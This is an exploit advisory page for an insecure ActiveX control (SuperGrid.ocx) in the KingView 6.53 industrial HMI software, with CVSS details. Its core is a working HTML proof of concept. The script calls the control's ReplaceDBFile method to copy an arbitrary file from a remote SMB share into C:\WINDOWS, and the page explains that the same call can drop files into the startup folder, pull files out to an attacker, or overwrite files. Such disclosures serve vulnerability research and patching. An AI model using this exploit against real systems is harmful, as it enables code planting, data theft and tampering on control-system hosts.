KingView 6.53 Insecure ActiveX Control (SuperGrid)

2013-09-05 / 2013-10-27
Credit: Blake
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 5.8/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: Partial

<html> <object classid='clsid:F494550F-A028-4817-A7B5-E5F2DCB4A47E' id='target'></object> <!-- KingView Insecure ActiveX Control - SuperGrid Vendor: http://www.wellintech.com Version: KingView 6.53 Tested on: Windows XP SP3 / IE Download: http://www.wellintech.com/documents/KingView6.53_EN.zip Author: Blake CLSID: F494550F-A028-4817-A7B5-E5F2DCB4A47E ProgId: SUPERGRIDLib.SuperGrid Path: C:\Program Files\KingView\SuperGrid.ocx MemberName: ReplaceDBFile Safe for scripting: False Safe for init: False Kill Bit: False IObject safety not implemented --> <title>KingView Insecure ActiveX Control Proof of Concept - SuperGrid.ocx</title> <p>This proof of concept will copy any arbritrary file from one location to a second location. A malicious user may be able to use this to copy a file from an attacker controlled share to the target or from the target to an attacker controlled system (ie from an attacker share to the startup folder). It can also be used to overwrite existing files.</p> <input type=button onclick="copyfile()" value="Do It!"> <script> function copyfile() { var file1 = "\\\\192.168.1.165\\share\\poc.txt"; //source var file2 = "c:\\WINDOWS\\poc.txt"; //destination result = target.ReplaceDBFile(file1,file2); } </script>

References:

http://www.wellintech.com/documents/KingView6.53_EN.zip


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top